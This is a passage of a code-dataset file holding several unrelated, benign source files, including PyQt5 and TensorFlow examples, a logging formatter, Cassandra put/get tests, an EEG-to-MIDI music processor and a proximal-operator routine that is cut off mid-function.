= Scene()\n self.setSceneRect(0, 0, 300, 300) \n self.setScene(self.scene) \n \n \n def keyPressEvent(self, event): \n \n key = event.key() \n \n if key == Qt.Key_U:\n \n if self.group != None and self.group.isSelected():\n \n items = self.group.childItems()\n self.scene.destroyItemGroup(self.group)\n self.group = None\n \n for item in items:\n item.setSelected(False)\n \n if key == Qt.Key_G:\n \n if self.group:\n return\n \n selectedItems = self.scene.selectedItems()\n \n if len(selectedItems) > 0:\n self.group = MyGroup()\n \n for item in selectedItems:\n self.group.addToGroup(item)\n \n self.scene.addItem(self.group)\n\n \nclass Example(QWidget):\n \n def __init__(self):\n super().__init__()\n \n self.initUI()\n \n \n def initUI(self):\n \n hbox = QHBoxLayout()\n \n self.view = View() \n hbox.addWidget(self.view)\n \n self.setLayout(hbox)\n self.setWindowTitle(\"Grouping\")\n self.setGeometry(250, 150, 300, 300)\n \n\napp = QApplication([])\nex = Example()\nex.show()\nsys.exit(app.exec_())","sub_path":"advancedpyqt5/examples/graphicsview/grouping.py","file_name":"grouping.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"441392324","text":"import collections\nimport datetime\nimport json\nimport logging\nimport time\n\n# Python 2 compatibility\ntry:\n from logging.handlers import QueueHandler\nexcept ImportError:\n from logutils.queue import QueueHandler\n\n\n# Python 2/3 hack for stringify, below\ntry:\n unicode\nexcept NameError:\n unicode = str\n\n\nnocolor = 0\nred = 31\ngreen = 32\nyellow = 33\nblue = 34\ngray = 37\nstarttime = time.time()\n\n\ndef secs_since(starttime):\n \"\"\"Return the (padded) number of whole seconds since `starttime`.\n\n :param starttime: time to calculate seconds since\n :type starttime: int number of seconds since the epoch\n :returns: number of seconds since starttime padded to 4 with 0s\n :rtype: str\n \"\"\"\n return '{0:0>4}'.format(int(time.time() - starttime))\n\n\ndef strtime():\n \"\"\"Return the current time in a string conforming to RFC3339.\n\n :returns: current time in RFC3339 format\n :rtype: str\n \"\"\"\n\n curr_time = time.time()\n fmtd_time = time.strftime('%Y-%m-%dT%H:%M:%S', time.localtime(curr_time))\n\n utc_offset = ((datetime.datetime.fromtimestamp(curr_time) -\n datetime.datetime.utcfromtimestamp(curr_time)).\n total_seconds())\n utc_hours = int(utc_offset // 3600)\n utc_mins = abs(int(utc_offset % 3600 // 60))\n\n return '{0}{1:0=+3}:{2:0>2}'.format(fmtd_time, utc_hours, utc_mins)\n\n\ndef levelcolor(level):\n \"\"\"Return the terminal color number appropriate for the logging level.\n\n :param int level: logging level in integer form\n :returns: the SGR parameter number for foreground text color\n :rtype: int\n \"\"\"\n\n if level == logging.DEBUG:\n return green\n elif level == logging.WARNING:\n return yellow\n elif level in (logging.ERROR, logging.CRITICAL):\n return red\n else:\n return blue\n\n\nclass DictLogFilter(object):\n \"\"\"A logging 'filter' that adds arbitrary data to messages.\n\n Depending on the output format type in self.output the filter converts a\n dict-type log msg to the appropriate format. The formats are intended to\n mimic the Sirupsen/logrus formats and are: 'json', 'text', and 'tty'. 
If\n    self.output is None or a different string, 'json' formatting is used.\n\n    The 'json' output format is a valid json object with current time and log\n    level added to the log msg dict.\n\n    The 'text' output is a 'key=val key=val' string with current time and log\n    level added to the data from the log msg dict.\n\n    The 'tty' output is a colorized output with the log level (truncated to\n    four characters) followed by the number of seconds since program start\n    followed by the 'msg' value from the log msg dict, followed by any other\n    data from the dict in 'key=val key=val' format.\n    \"\"\"\n\n    def __init__(self, output=None):\n        \"\"\"Create a DictLogFilter object, setting the output format if given.\n\n        :param output: the output format\n        :type output: None or str from ['json', 'text', or 'tty']\n        :returns: a new DictLogFilter object\n        :rtype: DictLogFilter\n        \"\"\"\n        self.output = output\n\n    def filter(self, record):\n        \"\"\"Format the log record if record.msg is a dict.\n\n        Dispatch the record to the appropriate '*filter' method depending on\n        the value of self.output. json formatting is the default.\n\n        :param record: a log record instance\n        :type record: logging.LogRecord\n        :returns: always True to indicate the record should be handled\n        :rtype: bool\n        \"\"\"\n\n        if not isinstance(record.msg, dict):\n            return True\n\n        if self.output == 'text':\n            return self.text_filter(record)\n        elif self.output == 'tty':\n            return self.tty_filter(record)\n        else:\n            return self.json_filter(record)\n\n    def json_filter(self, record):\n        \"\"\"Format the log record in json style.\n\n        :param record: a log record instance\n        :type record: logging.LogRecord\n        :returns: always True to indicate the record should be handled\n        :rtype: bool\n        \"\"\"\n        # Add time and level entries.\n        record.msg['time'] = strtime()\n        record.msg['level'] = record.levelname.lower()\n\n        # Ensure all keys and values are stringified to assist json.dumps.\n        record.msg = stringify(record.msg)\n\n        # Make sure msg is valid JSON.\n        record.msg = json.dumps(record.msg)\n        return True\n\n    def tty_filter(self, record):\n        \"\"\"Format the log record in tty style.\n\n        :param record: a log record instance\n        :type record: logging.LogRecord\n        :returns: always True to indicate the record should be handled\n        :rtype: bool\n        \"\"\"\n\n        # Ensure all keys and values are stringified.\n        record.msg = stringify(record.msg)\n\n        # Construct the start of the message.\n        out = '\x1b[{0}m{1}\x1b[0m[{2}] {3}'.format(levelcolor(record.levelno),\n                                                    record.levelname[:4],\n                                                    secs_since(starttime),\n                                                    record.msg.get('msg', ''))\n\n        # Pad to or truncate at 80 characters.\n        out = '{0:<80}'.format(out)\n\n        # Format into colorized k=v pairs\n        for k, v in record.msg.items():\n            if k != 'msg':\n                out = out + ' \x1b[{0}m{1}\x1b[0m={2}'\\\n                    .format(levelcolor(record.levelno), k, v)\n\n        record.msg = out\n\n        return True\n\n    def text_filter(self, record):\n        \"\"\"Format the log record in text style.\n\n        :param record: a log record instance\n        :type record: logging.LogRecord\n        :returns: always True to indicate the record should be handled\n        :rtype: bool\n        \"\"\"\n\n        # Add time and level entries.\n        record.msg['time'] = strtime()\n        record.msg['level'] = record.levelname.lower()\n\n        # Ensure all keys and values are stringified.\n        record.msg = stringify(record.msg)\n\n        # Attempt to meet the logfmt-compatible format.\n        # Format into k=v pairs, quoting the v's.\n        record.msg = ['{0}=\"{1}\"'.format(k, v) for k, v in record.msg.items()]\n\n        # Join with a space\n        record.msg = \" 
\".join(record.msg)\n\n return True\n\n\nclass DictQueueHandler(QueueHandler):\n \"\"\"A logging QueueHandler that does *not* convert dict msgs to strings.\n\n In order to make the log record picklable, the logging QueueHandler calls\n self.prepare, which calls self.format, before enqueuing the log record.\n This is problematic for the DictLogFilter because it converts the dict into\n a string. See https://hg.python.org/cpython/file/3.5/Lib/logging/handlers.py#l1289\n for details.\n \n This handler attempts to make the log record picklable without converting\n dict msgs to strings. If the msg is a dict, it reconstructs the dict with\n the result of calling str on all its items. If args exist, it does the same\n there. If exc_info exists, it uses self.formatter.formatException to\n convert it to string and then stores it in the exc_text attribute and wipes\n exc_info.\n \"\"\" # noqa\n\n formatter = logging.Formatter()\n\n def prepare(self, record):\n \"\"\"Prepare the log record for pickling.\n\n If record.msg is a mapping, call str on all its items. If record.args\n is a sequence or mapping, call str on all its items. Convert\n record.exc_info to a string at record.exc_text, using\n self.formatter.formatException, and wipe out record.exc_info.\n\n :param record: the log record to prepare\n :type record: logging.LogRecord\n :returns: the prepared log record\n :rtype: logging.LogRecord\n \"\"\"\n\n record.msg = stringify(record.msg)\n record.args = stringify(record.args)\n\n if record.exc_info:\n record.exc_text = self.formatter.formatException(record.exc_info)\n record.exc_info = None\n\n return record\n\n\ndef stringify(obj):\n \"\"\"Recursively str() an object, leaving mappings and sequences.\"\"\"\n if isinstance(obj, str):\n new_obj = obj\n elif isinstance(obj, unicode):\n new_obj = str(obj)\n elif isinstance(obj, collections.Mapping):\n new_obj = {str(k): stringify(v) for k, v in obj.items()}\n elif isinstance(obj, collections.Sequence):\n new_obj = [stringify(i) for i in obj]\n else:\n new_obj = str(obj)\n return new_obj\n","sub_path":"pedsnetdcc/dict_logging.py","file_name":"dict_logging.py","file_ext":"py","file_size_in_byte":8579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"182525057","text":"from django.template.response import TemplateResponse\nfrom django.views.generic import TemplateView\n\n\nclass HomePageView(TemplateView):\n template_name = \"home.html\"\n\n def get(self, request, *args, **kwargs):\n context = {}\n return TemplateResponse(request, self.template_name, context=context)\n","sub_path":"travelsite/articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"222523547","text":"#!/usr/bin/env python\n\n\"\"\"\nTensorFlow MLP Mnist\n\nReference:\n https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/tutorials/mnist/mnist_softmax.py\n See extensive documentation at http://tensorflow.org/tutorials/mnist/beginners/index.md\n\nA very simple MNIST classifer.\n\"\"\"\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport time\nfrom six.moves import urllib, xrange\nimport sys\nfrom os import path\nsys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )\nimport Utils.benchmark_util as util\n\nNUM_CLASSES = 10\nIMAGE_SIZE = 28\nIMAGE_PIXELS = IMAGE_SIZE * IMAGE_SIZE * 1\nONE_HOT = True\n\nTOWER_NAME = 
'mlp_tower'\n\nFLAGS = tf.app.flags.FLAGS\n# max_iteration = (epochs * numExamples)/batchSize (15 * 60000)/128\ntf.app.flags.DEFINE_integer('max_iter', 9000, 'Number of iterations to run trainer.')\ntf.app.flags.DEFINE_integer('test_iter', 100, 'Number of iterations to run test.')\ntf.app.flags.DEFINE_integer('hidden1_units', 1000, 'Number of units in hidden layer 1.')\ntf.app.flags.DEFINE_integer('batch_size', 100, 'Batch size. Must divide evenly into the dataset sizes.')\ntf.app.flags.DEFINE_string('train_dir', 'data', 'Directory to put the training data.')\ntf.app.flags.DEFINE_float('learning_rate', 6e-4, 'Initial learning rate.')\ntf.app.flags.DEFINE_float('momentum', 0.9, 'Momentum.')\ntf.app.flags.DEFINE_float('l2', 1e-4, 'Weight decay.')\ntf.app.flags.DEFINE_integer('seed', 42, 'Random seed.')\n\n\ndef _inference(images):\n    \"\"\"Build the MNIST model up to where it may be used for inference.\n    \"\"\"\n    util.LOGGER.debug(\"Build Model\")\n    with tf.variable_scope('hidden1'):\n        weights = util.init_weights([IMAGE_PIXELS, FLAGS.hidden1_units], FLAGS.seed, FLAGS.l2)\n        biases = tf.Variable(tf.zeros([FLAGS.hidden1_units], dtype=util.DTYPE), dtype=util.DTYPE, name='biases')\n        hidden1 = tf.nn.relu(tf.matmul(images, weights) + biases)\n    with tf.variable_scope('softmax_linear'):\n        weights = util.init_weights([FLAGS.hidden1_units, NUM_CLASSES], FLAGS.seed, FLAGS.l2)\n        biases = tf.Variable(tf.zeros([NUM_CLASSES], dtype=util.DTYPE), dtype=util.DTYPE, name='biases')\n        logits = tf.nn.softmax(tf.matmul(hidden1, weights) + biases)\n    return logits\n\n\ndef run(core_type=\"CPU\"):\n    total_time = time.time()\n    num_gpus = util.NUM_GPUS[core_type]\n\n    data_load_time = time.time()\n    # Import data\n    mnist = util.load_data(input_data, ONE_HOT)\n    data_load_time = time.time() - data_load_time\n    with tf.Graph().as_default():\n        util.LOGGER.debug(\"Load Data\")\n        images_placeholder, labels_placeholder = util.placeholder_inputs(ONE_HOT, IMAGE_PIXELS, NUM_CLASSES)\n\n        # Build model\n        logits = _inference(images_placeholder)\n\n        # Define loss and optimizer\n        cross_entropy = -tf.reduce_sum(labels_placeholder*tf.log(logits)) # softmax & cross entropy\n        train_op = util.setup_optimizer(cross_entropy, FLAGS.learning_rate, FLAGS.momentum)\n\n        config = tf.ConfigProto(device_count={'GPU': num_gpus})\n        sess = tf.InteractiveSession(config=config)\n        sess.run(tf.initialize_all_variables())\n\n        train_time = time.time()\n        util.LOGGER.debug(\"Train Model\")\n        for iter in xrange(FLAGS.max_iter):\n            feed_dict = util.fill_feed_dict(mnist.train, images_placeholder, labels_placeholder, FLAGS.batch_size)\n            _, loss_value = sess.run([train_op, cross_entropy], feed_dict=feed_dict)\n            if iter % 100 == 0: util.LOGGER.debug('Iter %d: loss = %.2f' % (iter, loss_value))\n        train_time = time.time() - train_time\n\n        # Test trained model\n        test_time = time.time()\n        util.do_eval(sess, logits, images_placeholder, labels_placeholder, mnist.test, ONE_HOT, FLAGS.test_iter, FLAGS.batch_size)\n        test_time = time.time() - test_time\n        sess.close()\n\n    total_time = time.time() - total_time\n    print(\"****************Example finished********************\")\n    util.printTime('Data load', data_load_time)\n    util.printTime('Train', train_time)\n    util.printTime('Test', test_time)\n    util.printTime('Total', total_time)\n\n\nif __name__ == \"__main__\":\n    
run(sys.argv[1])\n\n","sub_path":"dl4j-core-benchmark/src/main/java/org/deeplearning4j/MLPMnistSingleLayer/tensorflow_mlp.py","file_name":"tensorflow_mlp.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"577612893","text":"#!/usr/bin/env python3\nfrom reportlab.platypus import SimpleDocTemplate\nfrom reportlab.platypus import Paragraph, Spacer, Table, Image\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom reportlab.lib import colors\n\ndef generate(filename, title, additional_info, table_data):\n styles = getSampleStyleSheet()\n report = SimpleDocTemplate(filename)\n report_title = Paragraph(title, styles[\"h1\"])\n report_info = Paragraph(additional_info, styles[\"BodyText\"])\n table_style = [('GRID', (0,0), (-1,-1), 1, colors.black),\n ('FONTNAME', (0,0), (-1,0), 'Helvetica-Bold'),\n ('ALIGN', (0,0), (-1,-1), 'CENTER')]\n report_table = Table(data=table_data, style=table_style, hAlign=\"LEFT\")\n empty_line = Spacer(1,20)\n report.build([report_title, empty_line, report_info, empty_line, report_table])\n\ndef generate_reports(filename, title, para):\n elements = []\n i=0\n\n # Open the model report\n file=open(para)\n infile = file.read()\n report_paragraphs = infile.split(\"\\n\")\n \n styles = getSampleStyleSheet()\n report = SimpleDocTemplate(filename)\n report_title = Paragraph(title, styles[\"h1\"])\n elements.append(report_title)\n empty_line = Spacer(1, 0)\n elements.append(Spacer(1,2))\n for param in report_paragraphs:\n elements.append(Paragraph(param, styles[\"BodyText\"]))\n i=i+1\n if i%2 ==0 :\n elements.append(empty_line)\n elements.append(empty_line)\n\n print(elements)\n #report_info = Paragraph(para, styles[\"BodyText\"])\n\n report.build(elements)\n","sub_path":"Course6/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"615831932","text":"# Opdracht 5 a\ndef opdracht5a(val):\n index = 0\n while index < len(val):\n print(str(index + 1) + ':' + val[index])\n index += 1\n# opdracht5a('awdawfiawhif')\n\n\n# Opdracht 5 b\ndef addDot(val):\n last = val[len(val) - 1]\n if last == '.':\n return val\n else:\n return val + '.'\n# addDot('adw')\n\ndef opdracht5b(text):\n text = text.split('.')\n result = ''\n for sentence in text:\n if sentence == '':\n break\n sentence = sentence.lstrip(' ')\n result += sentence[0].capitalize() + sentence[1:] + '. '\n return result\n# print(opdracht5b('python is een general-purpose programmeertaal. sql is een declarative programming language.'))\n\n\ndef opdracht5c(text):\n return ' '.join(text.split())\n# opdracht5c('a b')\n\n\ndef opdracht5d(text):\n text = text.replace('0', 'nul')\n text = text.replace('1', 'een')\n text = text.replace('2', 'twee')\n text = text.replace('3', 'drie')\n text = text.replace('4', 'vier')\n text = text.replace('5', 'vijf')\n text = text.replace('6', 'zes')\n text = text.replace('7', 'zeven')\n text = text.replace('8', 'acht')\n text = text.replace('9', 'negen')\n return text\n# opdracht5d('We zitten nu in 2017, volgend jaar is het 2018.')\n\n\ndef opdracht5e(text):\n text = opdracht5b(opdracht5d(addDot(opdracht5c(text))))\n print(text)\n# opdracht5e('we zitten nu in 2017. 
volgend jaar is het 2018')\n\n# Opdracht 6\n\n# pc 1 =\ndef m1():\n global s\n s = 'no spam...'\n print(s)\n t = 'Java...'\n print(t)\n x = 1\n z = 2\n m2(x, z)\n x = 3\n\ndef m2(x, y):\n x = x + 1\n z = y + 2\n m3(x, z)\n\ndef m3(x, b):\n x = 4\n x = m4(x)\n\ndef m4(z):\n return z + z\n\ns = 'I hate spam'\nt = 'Programming is great'\n# m1()\n# print(s)\n# print(t)\n\n\"\"\"\npc=166\npc=167,s='I hate spam'\npc=168,s='I hate spam',t='Programming is great'\npc=168,s='I hate spam',t='Programming is great'|pc=144, s='I hate spam'\npc=168,s='I hate spam',t='Programming is great'|pc=145, s='no spam...'\npc=168,s='I hate spam',t='Programming is great'|pc=146, s='no spam...'\npc=168,s='I hate spam',t='Programming is great'|pc=147, s='no spam...'\npc=168,s='I hate spam',t='Programming is great'|pc=148, s='no spam...',t='Java...'\npc=168,s='I hate spam',t='Programming is great'|pc=150, s='no spam...',t='Java...',x=1\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=155,x=1,y=2\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=156,x=2,y=2\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=157,x=2,y=4\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=158,x=2,y=4|pc=160,x=2,b=4\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=158,x=2,y=4|pc=161,x=4,b=4\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=158,x=2,y=4|pc=161,x=4,b=4|pc=164,z=4,return=8\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=158,x=2,y=4|pc=161,x=8,b=4\npc=168,s='I hate spam',t='Programming is great'|pc=151, s='no spam...',t='Java...',x=1,y=2|pc=157,x=8,y=4\npc=168,s='I hate spam',t='Programming is great'|pc=152, s='no spam...',t='Java...',x=1,y=2\npc=168,s='I hate spam',t='Programming is great'|pc=152, s='no spam...',t='Java...',x=3,y=2\npc=169,s='I hate spam',t='Programming is great'\npc=170,s='I hate spam',t='Programming is great'\n\"\"\"","sub_path":"1.2/5-6.py","file_name":"5-6.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"44101139","text":"from .classifier import *\nfrom .eegData import *\nfrom .music import *\nfrom .client import *\n\nfrom MusEEG import parentDir, resetPort\n\nimport pickle\nimport threading\n\n\"\"\"\nDEPRECATED\nthis is the processor used to run the demo app\n\"\"\"\n\n\nclass cerebro:\n \"\"\"\n hello message to display in UI\n \"\"\"\n demomsg = (\n 'Hello! welcome to the MusEEG demo. This demo will: \\n'\n '- send a pre-recorded brain signal of your choice when you click on any of the gesture buttons\\n'\n '- process it using a 4-level, db2 wavelet transform\\n'\n '- extract the first four statistical moments of the wavelet decompositions (mean, variance, skewness, kurtosis)\\n'\n '- classify it using a deep neural network\\n'\n '- using the results from the DNN, play the chord that is referenced to the gesture using MIDI\\n'\n '- to change a chord, press the \"update chord dictionary\" button after youve changed the notes\\n')\n eeg = eegData()\n\n gestures = ['smile', 'eyebrows', 'lookleft', 'lookright',\n 'neutral', 'scrunch']\n\n def __init__(self):\n #default mididict. 
it will be updated every time the user presses the update chord button\n        self.mididict = self.loadMIDIdict(os.path.join(parentDir, 'data', 'MIDIdicts', 'cMajorExtended.pickle'))\n\n        # open and reset midiport\n        resetPort()\n\n        # load the ANN classifier (bigbrain for whole eeg chunks, small brain for small chunks)\n        self.bigBrain = classifier()\n        self.bigBrain.loadmodel(os.path.join(parentDir, 'data', 'savedModels', 'bigBrain_v2'))\n\n        self.smallBrain = classifier()\n        self.smallBrain.loadmodel(os.path.join(parentDir, 'data', 'savedModels', 'smallBrain_v1'))\n\n        # define chords and tempo to be used\n        music.tempo = 60 # bpm\n        music.midiChannel = 0 # add 1\n\n    def setupClient(self):\n        self.client = client()\n        self.client.setup()\n\n    def updateChordList(self, chordlistlist):\n        for c in chordlistlist:\n            index = chordlistlist.index(c)\n            gestureBeingDefined = self.gestures[index]\n            self.mididict[gestureBeingDefined] = chord(notelist=chordlistlist[index], name=gestureBeingDefined)\n        print(self.mididict)\n\n    def saveMIDIdict(self, addressPath):\n        with open(os.path.join(addressPath), 'wb') as handle:\n            pickle.dump(self.mididict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n    def loadMIDIdict(self, addressPath):\n        with open(addressPath, 'rb') as handle:\n            self.mididict = pickle.load(handle)\n        return self.mididict\n\n    def loadFromDataSet(self, name):\n        # subdirectory where sample chunks are located and load a random chunk from training dataset\n        SUBDIR = os.path.join('trainbatch1', 'bigChunks')\n        self.eeg.loadChunkFromTraining(subdir=SUBDIR, filename=name + '_' + str(np.random.randint(0, 60)) + '.csv')\n\n    def processAndPlay(self, arp, tempo, arpDurationFromGUI, noteDurationFromGUI):\n        print('performing wavelet transform')\n        brainInput = self.eeg.process()\n\n        self.arpDurationFromGUI = arpDurationFromGUI\n        self.noteDurationFromGUI = noteDurationFromGUI\n\n        # classify facial gesture in DNN\n        brainOutput = self.bigBrain.classify(brainInput.reshape(1, 350))\n        print('the neural network has taken the brain signal and classified it.')\n        self.gestureResult = self.gestures[brainOutput]\n        print('classification result: ' + self.gestureResult)\n\n        # refer classification to midi dictionary and refer chord object to musician\n        musician = self.mididict[self.gestureResult]\n        musician.set_tempo(tempo=tempo)\n\n        #with threading\n        musicianProcess = threading.Thread(target=self.perform, args=[musician, arp])\n        musicianProcess.start()\n\n    def perform(self, musician, arp):\n        if arp:\n            print('arpeggiate!')\n            musician.arpeggiate(notelength=self.arpDurationFromGUI, vel=30, numTimes=8)\n\n        else:\n            musician.panic()\n            musician.playchord(qtrnotes=self.noteDurationFromGUI, vel=30)\n","sub_path":"MusEEG/cerebro.py","file_name":"cerebro.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"75610630","text":"from dtest import Tester\nimport tools\nfrom tools import no_vnodes, create_c1c2_table, ThriftConnection\n\nimport time\n\nclass TestPutGet(Tester):\n\n    def putget_test(self):\n        \"\"\" Simple put/get on a single row, hitting multiple sstables \"\"\"\n        self._putget()\n\n    def putget_snappy_test(self):\n        \"\"\" Simple put/get on a single row, but hitting multiple sstables (with snappy compression) \"\"\"\n        self._putget(compression=\"Snappy\")\n\n    def putget_deflate_test(self):\n        \"\"\" Simple put/get on a single row, but hitting multiple sstables (with deflate compression) \"\"\"\n        self._putget(compression=\"Deflate\")\n\n    # Simple queries, but with flushes in between inserts to make sure we hit\n    # sstables (and more than one) on reads\n    def _putget(self, compression=None):\n        cluster = self.cluster\n\n        cluster.populate(3).start()\n        [node1, node2, node3] = cluster.nodelist()\n\n        cursor = self.patient_cql_connection(node1).cursor()\n        self.create_ks(cursor, 'ks', 3)\n        self.create_cf(cursor, 'cf', compression=compression)\n\n        tools.putget(cluster, cursor)\n\n    def non_local_read_test(self):\n        \"\"\" This test reads from a coordinator we know has no copy of the data \"\"\"\n        cluster = self.cluster\n\n        cluster.populate(3).start()\n        [node1, node2, node3] = cluster.nodelist()\n\n        cursor = self.patient_cql_connection(node1).cursor()\n        self.create_ks(cursor, 'ks', 2)\n        create_c1c2_table(self, cursor)\n\n        # insert and get at CL.QUORUM (since RF=2, node1 won't have all key locally)\n        for n in xrange(0, 1000):\n            tools.insert_c1c2(cursor, n, \"QUORUM\")\n            tools.query_c1c2(cursor, n, \"QUORUM\")\n\n    def rangeputget_test(self):\n        \"\"\" Simple put/get on ranges of rows, hitting multiple sstables \"\"\"\n\n        cluster = self.cluster\n\n        cluster.populate(3).start()\n        [node1, node2, node3] = cluster.nodelist()\n\n        cursor = self.patient_cql_connection(node1).cursor()\n        self.create_ks(cursor, 'ks', 2)\n        self.create_cf(cursor, 'cf')\n\n        tools.range_putget(cluster, cursor)\n\n    def wide_row_test(self):\n        \"\"\" Test wide row slices \"\"\"\n        cluster = self.cluster\n\n        cluster.populate(3).start()\n        [node1, node2, node3] = cluster.nodelist()\n\n        cursor = self.patient_cql_connection(node1).cursor()\n        self.create_ks(cursor, 'ks', 1)\n        self.create_cf(cursor, 'cf')\n\n        key = 'wide'\n\n        for x in xrange(1, 5001):\n            tools.insert_columns(self, cursor, key, 100, offset=x-1)\n\n        for size in (10, 100, 1000):\n            for x in xrange(1, (50001 - size) / size):\n                tools.query_columns(self, cursor, key, size, offset=x*size-1)\n\n    @no_vnodes()\n    def wide_slice_test(self):\n        \"\"\" \n        Check slicing a wide row. \n        See https://issues.apache.org/jira/browse/CASSANDRA-4919 \n\n        From Sylvain about duplicating:\n\n        Ok, so now that I think about it, you can't reproduce that with CQL currently.\n        You'll have to use the thrift get_paged_slice call as it's the only way to\n        trigger this.\n\n        Then, I think you'll be able to reproduce with the following steps:\n        1) you'd want to use 2 nodes with RF=1 and with ByteOrderedPartitioner (it's\n        possible to reproduce with a random partitioner but a tad more painful)\n        2) picks token for the nodes so that you know what goes on which node. For\n        example you may want that any row key starting with 'a' goes on node1, and\n        anything starting with a 'b' goes on node 2.\n        3) inserts data that span the two nodes. Say inserts 20 rows 'a0' ... 'a9' and\n        'b0' ...'b9' (so 10 rows on each node) with say 10 columns on row.\n        4) then do a get_paged_slice for keys 'a5' to 'b4' and for the column filter, a\n        slice filter that picks the fifth last columns.\n        5) the get_paged_slice is supposed to return 95 columns (it should return the 5\n        last columns of a5 and then all 10 columns for 'a6' to 'b4'), but without\n        CASSANDRA-4919 it will return 90 columns only (it will only return the 5 last\n        columns of 'b0').\n        \"\"\"\n        cluster = self.cluster\n        cluster.set_configuration_options(values={'partitioner': 'org.apache.cassandra.dht.ByteOrderedPartitioner'})\n        cluster.populate(2)\n        [node1, node2] = cluster.nodelist()\n        node1.set_configuration_options(values={'initial_token': \"a\".encode('hex') })\n        node2.set_configuration_options(values={'initial_token': \"b\".encode('hex') })\n        cluster.start()\n        time.sleep(.5)\n        cursor = self.patient_cql_connection(node1, version=\"2.0.0\").cursor()\n        self.create_ks(cursor, 'ks', 1)\n\n        query = \"\"\"\n            CREATE TABLE test (\n                k text PRIMARY KEY\n            );\n        \"\"\"\n        cursor.execute(query)\n        time.sleep(.5)\n\n        for i in xrange(10):\n            key_num = str(i).zfill(2)\n            query1 = \"INSERT INTO test (k, 'col0', 'col1', 'col2', 'col3', 'col4', 'col5', 'col6', 'col7', 'col8', 'col9') VALUES ('a%s', 0, 1, 2, 3, 4, 5, 6, 7, 8, 9)\" % (key_num)\n            query2 = \"INSERT INTO test (k, 'col0', 'col1', 'col2', 'col3', 'col4', 'col5', 'col6', 'col7', 'col8', 'col9') VALUES ('b%s', 0, 1, 2, 3, 4, 5, 6, 7, 8, 9)\" % (key_num)\n            cursor.execute(query1)\n            cursor.execute(query2)\n\n        cursor.close()\n\n        tc = ThriftConnection(node1, ks_name='ks', cf_name='test')\n        tc.use_ks()\n\n        # Slice on the keys\n        rnge = tc.Cassandra.KeyRange(\n            start_key=\"a%s\" % ('5'.zfill(2)),\n            end_key=\"b%s\" % ('4'.zfill(2)),\n            count=9999,\n        )\n        rows = tc.client.get_paged_slice(\n            column_family='test',\n            range=rnge,\n            start_column='col5',\n            consistency_level=tc.Cassandra.ConsistencyLevel.ONE,\n        )\n        keys = [fd.key for fd in rows]\n        columns = []\n        for row in rows:\n            cols = [col.column.name for col in row.columns]\n            columns.extend(cols)\n            #print row.key\n            #print cols\n        \n        assert len(columns) == 95, \"Regression in cassandra-4919. Expected 95 columns, got %d.\" % len(columns)\n","sub_path":"putget_test.py","file_name":"putget_test.py","file_ext":"py","file_size_in_byte":6301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"37161234","text":"import torch\nimport matplotlib.pyplot as plt\nimport pickle\nimport time\nimport argparse \nimport numpy as np\nimport sympy as sym\nimport math\nfrom numpy import linalg as LA\nimport logging\nfrom scipy.interpolate import interp1d\n\ntorch.manual_seed(1993)\n\ndef solve_ga_bisection(a, p, epsilon=1.e-8):\n    \"\"\"Return the solution of (x/a)^(p-1)+x=1, via bi-section method.\"\"\"\n    if a>0.:\n        U = 1\n        L = 0.\n        error = epsilon + 1\n        f = lambda x:(x/a)**(p-1)+x-1\n        while error>epsilon:\n            C = (L+U)/2. 
\n if f(C)*f(U) <= 0:\n L = C\n else:\n U = C\n \n error = (U-L)\n \n \n return C\n else:\n return 0.\n\ndef pNormProxOp(V, rho, p=2, eps=1.e-6, g_est=None):\n \"\"\"\n Return the p-norm prox operator for the vector V\n argmin_X ||X||_p + rho/2 \\|X - V\\|_2^2\n \"\"\"\n def g_func(a, p, bisect=True):\n \"Return the solution of (x/a)^(p-1) + x = 1\"\n if a>0:\n x = sym.Symbol(\"x\", positive=True)\n sols = sym.solvers.solve((x/a)**(p-1)+x-1, x)\n if len(sols) == 0:\n sol = 0.\n else:\n sol = max(sols)\n return sol\n else:\n return 0.\n\n t_start = time.time()\n b_size, data_size = V.size()\n\n\n if b_size != 1:\n raise Exception('V must has a batch dimenstion of one.')\n V = V.squeeze(0)\n\n if p == 2:\n return EuclidianProxOp(V, 1./rho)\n\n elif p == 1:\n return ell1normProxOp(V, rho)\n elif p == -2:\n return norm2squaredProxOp(V, rho)\n signs = torch.sign(V)\n V_normalized = rho * torch.abs(V)\n vec_size = V_normalized.size()[0]\n q = p/(p-1.)\n if torch.norm(V_normalized, p=q) < 1:\n U = torch.zeros( vec_size )\n U = U.unsqueeze(0)\n return U \n upper_bound = 